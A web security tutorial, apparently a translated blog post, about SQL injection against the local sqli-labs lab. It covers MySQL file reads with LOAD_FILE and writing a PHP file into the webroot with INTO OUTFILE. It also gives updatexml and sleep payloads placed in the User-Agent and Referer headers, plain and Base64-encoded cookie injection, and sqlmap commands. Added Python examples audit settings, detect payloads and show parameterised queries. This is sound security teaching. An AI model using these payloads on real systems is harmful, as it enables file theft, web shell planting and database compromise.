Web security offensive and defensive learning 07: MySQL injection to read and write files, HTTP header SQL injection, HTTP User-Agent injection, HTTP Referer injection, cookie injection (key points)

1. MySQL injection: reading and writing files

During a penetration test MySQL offers more than data retrieval: with sufficient privileges it can also be used to read and write files on the server.

Prerequisites for reading files:

  • 1. The database user must have sufficiently high privileges, ideally root
  • 2. secure_file_priv must not be NULL

The value of secure_file_priv is shown in the figure. Its default value has to be changed by hand.

Modify the database configuration file:
After saving the file, restart phpStudy2018 and check the value again:


Reading the contents of a file

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('D:\1.txt'),3 --+

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('C:\Users\Administrator\Desktop\sqlmap\sqlmapproject-sqlmap-3b7dd2c\target.txt'),3 --+

Enabling file writing in MySQL

show variables like '%general%';   # default is off
set global general_log = on;
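The two settings this section changes, secure_file_priv and general_log, are also what a database administrator audits when hardening a server. The following Python script is an added example and not part of the original article: it parses a my.ini fragment and reports what file access LOAD_FILE and INTO OUTFILE are allowed, plus whether the general query log is on. The ini fragments are constructed samples; the classification of secure_file_priv (NULL disables file reads and writes, an empty string removes the restriction, a path confines them to that directory) is standard MySQL behaviour.

```python
import configparser

# Constructed my.ini fragments for this example, not the lab's real configuration file.
WEAK_INI = """
[mysqld]
secure_file_priv=""
general_log=ON
"""

HARDENED_INI = """
[mysqld]
secure-file-priv=NULL
general_log=OFF
"""

RESTRICTED_INI = """
[mysqld]
secure_file_priv="C:/ProgramData/MySQL/Uploads/"
"""


def mysqld_options(ini_text: str) -> dict:
    """Return the [mysqld] options with names normalised to underscore form."""
    parser = configparser.ConfigParser(strict=False, interpolation=None, allow_no_value=True)
    parser.read_string(ini_text)
    if not parser.has_section("mysqld"):
        return {}
    # MySQL accepts both secure-file-priv and secure_file_priv; configparser lowercases names.
    return {key.replace("-", "_"): value for key, value in parser["mysqld"].items()}


def classify_secure_file_priv(raw) -> str:
    """Map the raw option value to the file access it allows for LOAD_FILE / INTO OUTFILE."""
    if raw is None:
        return "unset (server default applies; it depends on MySQL version and build)"
    value = raw.strip().strip('"\'')
    if value.upper() == "NULL":
        return "disabled"
    if value == "":
        return "unrestricted"
    return f"restricted to {value}"


def assess_file_access(ini_text: str) -> dict:
    """Summarise the file-access posture of one configuration fragment."""
    opts = mysqld_options(ini_text)
    file_access = classify_secure_file_priv(opts.get("secure_file_priv"))
    if "general_log" not in opts:
        general_log = False
    else:
        log_raw = opts["general_log"]
        # A bare "general_log" line (no value) enables the option, as do ON / 1 / TRUE.
        general_log = log_raw is None or log_raw.strip().upper() in ("ON", "1", "TRUE")
    findings = []
    if file_access == "unrestricted":
        findings.append("secure_file_priv is empty: LOAD_FILE and INTO OUTFILE may use any path the server process can reach")
    if general_log:
        findings.append("general_log is ON: every statement is appended to a file written by the server process")
    return {"file_access": file_access, "general_log": general_log, "findings": findings}


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI), ("restricted", RESTRICTED_INI)):
        print(label, assess_file_access(ini))
```

The weak fragment is the state the lab creates for the exercise; the hardened fragment is what a production server should look like unless a specific import directory is needed, in which case the restricted form confines file operations to that one directory.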

Now use SQL to write the file:

http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,'<?php phpinfo(); ?>',3 into outfile 'C:\\Users\\Administrator\\Desktop\\sqlmap\\sqlmapproject-sqlmap-3b7dd2c\\target.txt' --+

Note that backslashes in the path must be doubled; INTO OUTFILE writes the result of the preceding SQL query to the given path.

http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,"<?php phpinfo(); ?>",3 into outfile "G:\\phpstudy2018\\PHPTutorial\\WWW\\sqli\\Less-7\\1.php" --+

Using sqlmap to read and write files

python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --file-read "D:\\1.txt"

2. HTTP header SQL injection

Introduction to HTTP header injection
As security awareness grows, many sites defend against vulnerabilities such as SQL injection by filtering the parameters submitted by users.
The parameters that come directly from the user are filtered, but content submitted in the HTTP headers is often not filtered at all.

The updatexml function
UPDATEXML(XML_document, XPath_string, new_value);
First parameter: XML_document, a string: the XML document object, referred to here as Doc
Second parameter: XPath_string, a string in XPath format
Third parameter: new_value, a string that replaces the data matched by the XPath

  • HTTP User-Agent injection
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1
0x7e is the hex code of the ~ character

Output the version information

Output the database name

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1' = '1
0x7e is the hex code of the ~ character

Testing methods and tools on another virtual machine running Kali:
The closing case for or '1'='1 is as follows:

# ' or '1'='1        error message
The normal SQL statement is:
select * from users where id = '1';

The derived closed statement is:
select * from users where id = '1' or '1'='1';      closed successfully


  • HTTP Referer injection
' or if(1=1,sleep(5),null)  or '1'='1

sqlmap security testing
sqlmap automatically searches forms for POST injection
sqlmap detects SQL injection on the specified parameters
For Referer injection, mark the injection point by appending * to the Referer value in the request file
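The payload shapes in this section (updatexml with 0x7e delimiters in the User-Agent, sleep() in the Referer, quote-closing tautologies) are also what a defender looks for in request logs or a WAF rule set. The Python below is an added example and not part of the original post: it runs a small signature list over the three headers of a few constructed requests and labels what it finds. The request samples and the signature list are assumptions made for the example; only the injection strings come from this page.

```python
import re

# Constructed request headers for the example; only the injection strings are taken from this page.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0 (Windows NT 10.0) Firefox/72.0",
     "Referer": "http://127.0.0.1/sqli/Less-1/",
     "Cookie": "uname=admin"},
    {"User-Agent": "' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1",
     "Referer": "http://127.0.0.1/sqli/Less-1/",
     "Cookie": "uname=admin"},
    {"User-Agent": "Mozilla/5.0",
     "Referer": "' or if(1=1,sleep(5),null)  or '1'='1",
     "Cookie": "uname=admin"},
    {"User-Agent": "Mozilla/5.0",
     "Referer": "http://127.0.0.1/sqli/Less-1/",
     "Cookie": "uname=admin' or 1=1 --+"},
]

# Signature list (an assumption for this example): one entry per payload shape shown on the page.
SIGNATURES = [
    ("error-based updatexml", re.compile(r"updatexml\s*\(", re.I)),
    ("time-based sleep", re.compile(r"\bsleep\s*\(\s*\d+", re.I)),
    ("hex tilde delimiter", re.compile(r"0x7e", re.I)),
    ("tautology", re.compile(r"\bor\s*'?1'?\s*=\s*'?1", re.I)),
    ("comment terminator", re.compile(r"(--\+?|#)\s*$")),
]

HEADERS_TO_INSPECT = ("User-Agent", "Referer", "Cookie")


def inspect_headers(headers: dict) -> dict:
    """Return {header_name: [signature labels]} for every inspected header that matches."""
    hits = {}
    for name in HEADERS_TO_INSPECT:
        value = headers.get(name, "")
        labels = [label for label, pattern in SIGNATURES if pattern.search(value)]
        if labels:
            hits[name] = labels
    return hits


def flagged_requests(requests) -> list:
    """Indexes of requests with at least one suspicious header, in the order a log reviewer sees them."""
    return [i for i, req in enumerate(requests) if inspect_headers(req)]


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, inspect_headers(req) or "clean")
```

Signature matching of this kind catches the textbook payloads but not encoded or obfuscated variants, so it belongs alongside, not instead of, parameterised queries in the application; the next section's Base64 cookie shows exactly why a filter that never decodes its input can be walked past.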

3. Cookie injection

Cookies described
The server can use cookies to carry arbitrary information and to record and maintain state across the otherwise stateless HTTP transport. The classic use of cookies is to determine whether a user is logged in to the site.
Cookie injection
The code receives parameters from the Cookie header but applies no filtering to them, which leads to a SQL injection vulnerability.

Injection payloads

Cookie: uname=admin' or 1=1 --+
Cookie: uname=admin' and updatexml(1,concat(0x7e,version(),0x7e),1) --+
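The root cause described above is that the cookie value is spliced into the SQL string. As an added example that is not part of the original post or of the sqli-labs code, the Python below shows the vulnerable lookup next to its parameterised replacement, using an in-memory SQLite database as a stand-in for MySQL so it runs offline (the table, rows and cookie parser are constructed for the example; the first payload is the one from the page).

```python
import sqlite3

# Constructed user table; sqlite3 stands in for MySQL so the example runs offline.
CONSTRUCTED_USERS = [("admin", "pw-admin"), ("dumb", "pw-dumb"), ("secure", "pw-secure")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", CONSTRUCTED_USERS)
    return conn


def parse_cookie(header: str) -> dict:
    """Split 'a=1; b=2' into a dict; values are returned untouched, as PHP's $_COOKIE would."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip()] = value.strip()
    return pairs


def lookup_vulnerable(conn: sqlite3.Connection, cookie_header: str) -> list:
    """What the lab code does: the cookie value is pasted straight into the SQL string."""
    uname = parse_cookie(cookie_header).get("uname", "")
    sql = "SELECT username FROM users WHERE username = '" + uname + "'"
    # With uname=admin' or 1=1 --+ the WHERE clause becomes a tautology and the
    # trailing quote is commented out, so every row comes back.
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, cookie_header: str) -> list:
    """Parameterised query: the cookie value is bound as data and never parsed as SQL."""
    uname = parse_cookie(cookie_header).get("uname", "")
    return [row[0] for row in conn.execute("SELECT username FROM users WHERE username = ?", (uname,))]


if __name__ == "__main__":
    db = make_db()
    for cookie in ("uname=admin", "uname=admin' or 1=1 --+"):
        print(repr(cookie), "vulnerable:", lookup_vulnerable(db, cookie), "safe:", lookup_safe(db, cookie))
```

The parameterised version returns nothing for the payload because no user is literally named `admin' or 1=1 --+`; that is the whole fix, and it needs no blacklist of quotes or keywords.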

sqlmap security test

sqlmap -r target.txt --level 3 --batch

Cookie injection with Base64
About Base64
Base64 is a process for encoding binary data as text characters; it can be used to transmit longer identifying information in an HTTP environment. Base64 is one of the most common encodings for transmitting 8-bit bytes over a network; it represents binary data using 64 printable characters.

The original content is converted to binary and taken six bits at a time from left to right; each group is padded with two leading 0 bits to form a new byte (the process is reversible).

Encoding rules

  • 1. Every 3 characters become 4 characters
  • 2. A newline is added every 76 characters
  • 3. The end of the data needs special handling (padding)

Cookie Base64 injection: code analysis
The cookie value is Base64 encoded

If the page reports "Warning: date(): ..." asking for date.timezone to be set in php.ini, set date.timezone = PRC there.
Insert the Base64-encoded injection statement into the corresponding position of the Cookie to complete detection of the SQL injection vulnerability.

After modifying and saving the file, restart.
Plaintext " or 1=1 # (encoded below)

IiBvciAxPTEgIw==
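To make the three encoding rules above concrete, and to show that the cookie value on this page carries exactly the plaintext stated, the Python below is an added example (not from the original article): it implements the six-bit grouping, the padding and the optional 76-character line wrap by hand, checks the result against the standard library, and decodes the page's cookie value. The defender's lesson is in decode_cookie_value: a filter that inspects the raw cookie sees only Base64 text, so decoding must happen before any check on the content.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b64encode_manual(data: bytes, line_length: int = 0) -> str:
    """Encode following the rules above: 6 bits at a time, '=' padding to 4-char groups, optional wrap."""
    bits = "".join(f"{byte:08b}" for byte in data)          # original content as a bit string
    chars = []
    for i in range(0, len(bits), 6):                          # take six bits, left to right
        group = bits[i:i + 6].ljust(6, "0")                   # last group padded with zero bits
        chars.append(B64_ALPHABET[int(group, 2)])             # two leading zero bits give a value 0..63
    chars.append("=" * (-len(chars) % 4))                     # rule 3: '=' padding to a multiple of 4
    text = "".join(chars)
    if line_length:                                           # rule 2: newline every 76 characters (MIME)
        text = "\n".join(text[i:i + line_length] for i in range(0, len(text), line_length))
    return text


def b64decode_manual(text: str) -> bytes:
    """Reverse of the above; tolerates the stray space and line breaks in a copied value."""
    clean = "".join(text.split()).rstrip("=")
    bits = "".join(f"{B64_ALPHABET.index(c):06b}" for c in clean)
    usable = len(bits) - len(bits) % 8                        # drop the zero padding bits
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def matches_stdlib(data: bytes) -> bool:
    """Self-check: the hand-written encoder agrees with base64.b64encode."""
    return b64encode_manual(data) == base64.b64encode(data).decode()


# Cookie value taken from this page; decoding it recovers the plaintext stated above it.
PAGE_COOKIE_VALUE = "IiBvciAxPTEgIw=="


def decode_cookie_value(value: str) -> str:
    """What a filter must do before inspecting the cookie: decode first, then look at the content."""
    return b64decode_manual(value).decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(decode_cookie_value(PAGE_COOKIE_VALUE))
    print(b64encode_manual(bytes(range(90)), 76))
```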

sqlmap security testing

python sqlmap.py -r target.txt --level 3 --tamper base64encode.py

Origin blog.csdn.net/weixin_42118531/article/details/104626207